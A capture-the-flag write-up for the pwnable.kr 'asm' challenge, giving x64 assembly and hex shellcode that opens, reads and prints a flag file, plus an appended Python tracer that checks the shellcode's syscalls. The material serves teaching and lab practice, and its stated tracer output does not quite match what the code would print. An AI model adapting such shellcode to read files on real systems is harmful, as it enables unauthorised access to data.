# 18 - asm

## The Challenge

Mommy! I think I know how to make shellcodes

`ssh asm@pwnable.kr -p2222` (pw: guest)

## The Solution

The challenge directory contains a readme:

> once you connect to port 9026, the "asm" binary will be executed under asm\_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really contains a file with an awfully long name.

It's time to run the binary:

![The last line and a half is my input, don't get confused :)](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIjzjryI-NJ0MhBEmsy%2F-MIroJChVAf86Cx4jSq-%2Fimage.png?alt=media\&token=e1548f7a-fa1a-422e-843f-63939436aacf)

Our input should be x64 shellcode that uses only `open, read` and `write` to print the flag. A peek at the source code shows there aren't any shenanigans, it's really what we need to do.

The source also contains a shellcode prefix that our shellcode gets concatenated to. Let's [decode](https://defuse.ca/online-x86-assembler.htm#disassembly2) it:

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2F-MIjzjryI-NJ0MhBEmsy%2F-MIrqJOInVmPc6lfX93y%2Fimage.png?alt=media\&token=4ee3964b-0701-4f3a-878b-a95eddf8bbbd)

It zeros the registers. That's actually quite nice on pwnable's side, thanks ^\_^

It's time to write some pure assembly! Using [this](https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md) wonderful table we created assembly that opens the flag file, reads it and outputs to stdout.

```
mov rax, 2
mov rdi, 0x4141406f
syscall
mov rdi, rax
mov rax, 0
mov rsi, 0x4141406f
mov rdx, 0x30
syscall
mov rax, 1
mov rdi, 1
syscall

# shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05
```

You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatenate the flag file name to the end of the shellcode, and that's its address. We also read the flag into the same location, since the name is no longer needed once the file is open. The final shellcode:

```
\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00
```
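To sanity-check a payload like the one above before submitting it (or when analysing someone else's), it helps to trace which syscalls it actually makes. The following is an added example, not part of the original write-up: a tiny decoder for just the three encodings the shellcode uses (`mov r64, imm32`, `mov rdi, rax`, `syscall`), which emulates the register moves and reports each syscall with its arguments, then checks them against the challenge's open/read/write allow-list. Registers are assumed to start at zero, as the prefix stub leaves them; the 58 shellcode bytes are copied from the block above.

```python
import struct

SYSCALLS = {0: "read", 1: "write", 2: "open", 60: "exit"}
# Register names indexed by the 3-bit ModRM reg/rm field (no REX.B used here).
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
ALLOWED = {"open", "read", "write"}

# The 58 shellcode bytes listed in the write-up above.
SHELLCODE = bytes.fromhex(
    "48C7C002000000" "48C7C76F404141" "0F05"
    "4889C7" "48C7C000000000" "48C7C66F404141" "48C7C230000000" "0F05"
    "48C7C001000000" "48C7C701000000" "0F05"
)

def trace_syscalls(code):
    """Return ([(name, rdi, rsi, rdx), ...], bytes_decoded).

    Registers start at zero (the challenge's prefix stub zeroes them).
    A syscall's return value is modelled as the string '<name>()' so a
    later 'mov rdi, rax' shows which call produced the fd.  Decoding stops
    at the first encoding this tiny decoder does not know (e.g. appended
    data such as the file name)."""
    regs = {r: 0 for r in REGS}
    calls, i = [], 0
    while i < len(code):
        op = code[i:i + 3]
        if op[:2] == b"\x0f\x05":                               # syscall
            nr = regs["rax"]
            name = SYSCALLS.get(nr, f"nr_{nr}") if isinstance(nr, int) else "unknown"
            calls.append((name, regs["rdi"], regs["rsi"], regs["rdx"]))
            regs["rax"] = f"{name}()"                           # return value
            i += 2
        elif op[:2] == b"\x48\xc7" and len(op) == 3 and op[2] >= 0xC0 and i + 7 <= len(code):
            # REX.W C7 /0 id : mov r64, imm32 (sign-extended to 64 bits)
            (imm,) = struct.unpack_from("<i", code, i + 3)
            regs[REGS[op[2] & 7]] = imm & 0xFFFFFFFFFFFFFFFF
            i += 7
        elif op[:2] == b"\x48\x89" and len(op) == 3 and op[2] >= 0xC0:
            # REX.W 89 /r : mov r/m64, r64 with mod=11 (register to register)
            regs[REGS[op[2] & 7]] = regs[REGS[(op[2] >> 3) & 7]]
            i += 3
        else:
            break                                                # data or unknown opcode
    return calls, i

def violates_allowlist(code):
    """Names of syscalls outside the challenge's open/read/write allow-list."""
    return [name for name, *_ in trace_syscalls(code)[0] if name not in ALLOWED]

if __name__ == "__main__":
    for name, rdi, rsi, rdx in trace_syscalls(SHELLCODE)[0]:
        print(f"{name}(rdi={rdi}, rsi={rsi:#x}, rdx={rdx:#x})")
```

Running it prints `open(rdi=0x4141406f, rsi=0x0, rdx=0x0)`, `read(rdi=open(), ...)` and `write(rdi=1, ...)`, which confirms the read buffer and the file name share the same address and that no syscall outside the allow-list is reached.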
